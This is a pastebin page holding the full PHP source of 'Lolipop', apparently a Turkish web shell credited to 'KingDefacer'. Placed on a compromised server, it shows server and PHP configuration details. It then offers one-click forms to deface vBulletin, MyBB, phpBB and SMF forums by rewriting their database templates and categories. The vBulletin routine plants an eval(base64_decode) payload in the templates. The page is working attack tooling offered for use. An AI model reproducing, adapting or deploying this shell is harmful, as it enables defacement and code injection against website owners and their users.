Lolipop Shell - Shells-Center.Com

SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 7:49 a.m.

FORMAT: Text only

SIZE: 14.8 kB

Raw Download

HITS: 591

Report
  1. <p align="right"></p><body bgcolor="#FFFFFF">
  2. <?php
  4. ######################## Begining of Coding ;) ######################
  5. error_reporting(0);
  7. $info = $_SERVER['SERVER_SOFTWARE'];
  8. $site = getenv("HTTP_HOST");
  9. $page = $_SERVER['SCRIPT_NAME'];
  10. $sname = $_SERVER['SERVER_NAME'];
  11. $uname = php_uname();
  12. $smod = ini_get('safe_mode');
  13. $disfunc = ini_get('disable_functions');
  14. $yourip = $_SERVER['REMOTE_ADDR'];
  15. $serverip = $_SERVER['SERVER_ADDR'];
  16. $version = phpversion();
  17. $ccc = realpath($_GET['chdir'])."/";
  18. $fdel = $_GET['fdel'];
  19. $execute = $_POST['execute'];
  20. $cmd = $_POST['cmd'];
  21. $commander = $_POST['commander'];
  22. $ls = "ls -la";
  23. $source = $_POST['source'];
  24. $gomkf = $_POST['gomkf'];
  25. $title = $_POST['title'];
  26. $sourcego = $_POST['sourcego'];
  27. $ftemp = "tmp";
  28. $temp = tempnam($ftemp, "cx");
  29. $fcopy = $_POST['fcopy'];
  30. $tuser = $_POST['tuser'];
  31. $user = $_POST['user'];
  32. $wdir = $_POST['wdir'];
  33. $tdir = $_POST['tdir'];
  34. $symgo = $_POST['symgo'];
  35. $sym = "xhackers.txt";
  36. $to = $_POST['to'];
  37. $sbjct = $_POST['sbjct'];
  38. $msg = $_POST['msg'];
  39. $header = "From:".$_POST['header'];
  42. //PHPinfo
  44. if(isset($_POST['phpinfo']))
  45. {
  46. die(phpinfo());
  47. }
  48. //Guvenli mod vs vs
  49. if ($smod)
  50. {
  51. $c_h = "<font color=red face='Verdana' size='1'>ON</font>";
  52. }
  53. else
  54. {
  55. $c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
  56. }
  58. //Kapali Fonksiyonlar
  59. if (''==($disfunc))
  60. {
  61. $dis = "<font color=green>None</font>";
  62. }
  63. else
  64. {
  65. $dis = "<font color=red>$disfunc</font>";
  66. }
  67. //Dizin degisimi
  68. if(isset($_GET['dir']) && is_dir($_GET['dir']))
  69. {
  70. chdir($_GET['dir']);
  71. }
  73. $ccc = realpath($_GET['chdir'])."/";
  75. //Baslik
  76. echo "<head>
  77. <style>
  78. body { font-size: 12px;
  80. font-family: arial, helvetica;
  82. scrollbar-width: 5;
  84. scrollbar-height: 5;
  86. scrollbar-face-color: black;
  88. scrollbar-shadow-color: silver;
  90. scrollbar-highlight-color: silver;
  92. scrollbar-3dlight-color:silver;
  94. scrollbar-darkshadow-color: silver;
  96. scrollbar-track-color: black;
  98. scrollbar-arrow-color: silver;
  100. }
  101. </style>
  103. <title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
  105. //Ana tablo
  106. echo "<body text='#FFFFFF'>
  107. <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
  108. <tr>
  109. <td><font color='#000000'>
  112. <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
  114. </tr>
  115. <tr>
  116. <td style='border: 1px solid #333333'>
  117. <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
  118. </tr>
  119. </table>";
  120. echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr>
  121. ';
  122. //Buton Listesi
  123. echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>";
  128. //VB HACK
  129. if (isset($_POST['vbulletin']))
  130. {
  131. echo "<center><table border=0 width='100%'>
  132. <tr><td>
  133. <center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
  134. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  135. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  136. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  138. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  139. <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  140. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  141. die();
  142. }
  143. $KingDefacer="Powered By Lolipop :))";
  144. $dbh = $_POST['dbh'];
  145. $dbu = $_POST['dbu'];
  146. $dbn = $_POST['dbn'];
  147. $dbp = $_POST['dbp'];
  148. $index = $_POST['index'];
  149. $index=str_replace("\'","'",$index);
  150. $set_index = "{\${eval(base64_decode(\'";
  152. $set_index .= base64_encode("echo \"$index\";");
  155. $set_index .= "\'))}}{\${exit()}}</textarea>";
  158. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
  159. {
  160. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
  161. mysql_select_db($dbn) or die(mysql_error());
  162. $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
  163. $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
  164. $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
  165. $result = mysql_query($loli1) or die (mysql_error());
  166. $result = mysql_query($loli2) or die (mysql_error());
  167. $result = mysql_query($loli3) or die (mysql_error());
  168. echo "<script>alert('Vb Hacked');</script>";
  169. }
  171. //MyBB Hack
  172. if (isset($_POST['mybulletin']))
  173. {
  174. echo "<center><table border=0 width='100%'>
  175. <tr><td>
  176. <center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
  177. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  178. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  179. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  180. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  181. <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  182. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  183. die();
  184. }
  185. $mybb_dbh = $_POST['mybbdbh'];
  186. $mybb_dbu = $_POST['mybbdbu'];
  187. $mybb_dbn = $_POST['mybbdbn'];
  188. $mybb_dbp = $_POST['mybbdbp'];
  189. $mybb_index = $_POST['mybbindex'];
  191. if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
  192. {
  193. mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
  194. mysql_select_db($mybb_dbn) or die(mysql_error());
  195. $prefix="mybb_";
  196. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  198. $result = mysql_query($loli7) or die (mysql_error());
  200. echo "<script>alert('MyBB Hacked');</script>";
  201. }
  202. //PhpBB
  203. if (isset($_POST['phpbb']))
  204. {
  205. echo "<center><table border=0 width='100%'>
  206. <tr><td>
  207. <center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
  208. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  209. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  210. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  211. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  212. <font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  213. <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  214. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  215. die();
  216. }
  217. $phpbb_dbh = $_POST['phpbbdbh'];
  218. $phpbb_dbu = $_POST['phpbbdbu'];
  219. $phpbb_dbn = $_POST['phpbbdbn'];
  220. $phpbb_dbp = $_POST['phpbbdbp'];
  221. $phpbb_kat = $_POST['phpbbkat'];
  222. $kategoriid=$_POST['katid'];
  224. if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
  225. {
  226. mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
  227. mysql_select_db($phpbb_dbn) or die(mysql_error());
  230. $loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
  232. $result = mysql_query($loli10) or die (mysql_error());
  234. echo "<script>alert('PhpBB Hacked');</script>";
  235. }
  236. //SmfHACK
  237. if (isset($_POST['smf']))
  238. {
  239. echo "<center><table border=0 width='100%'>
  240. <tr><td>
  241. <center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
  242. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  243. <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  244. <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  245. <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  246. <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  247. <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  249. <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  250. die();
  251. }
  252. $smf_dbh = $_POST['smfdbh'];
  253. $smf_dbu = $_POST['smfdbu'];
  254. $smf_dbn = $_POST['smfdbn'];
  255. $smf_dbp = $_POST['smfdbp'];
  256. $smf_index = $_POST['smf_index'];
  257. $smf_katid=$_POST['katid'];
  259. if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
  260. {
  261. mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
  262. mysql_select_db($smf_dbn) or die(mysql_error());
  263. $prefix="smf_";
  264. $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
  266. $result = mysql_query($loli12) or die (mysql_error());
  268. echo "<script>alert('smf Hacked');</script>";
  269. }
  272. //Alt taraf
  273. echo "
  276. <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
  277. <tr>
  278. <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
  280. <p><strong>Lolipop.php</strong></p>
  281. <p><strong>Edited By KingDefacer</strong></p>
  282. <p><strong></strong><br>
  283. </p></td>
  284. </tr></table>";
  288. // Kod bitisi
  289. ?>
comments powered by Disqus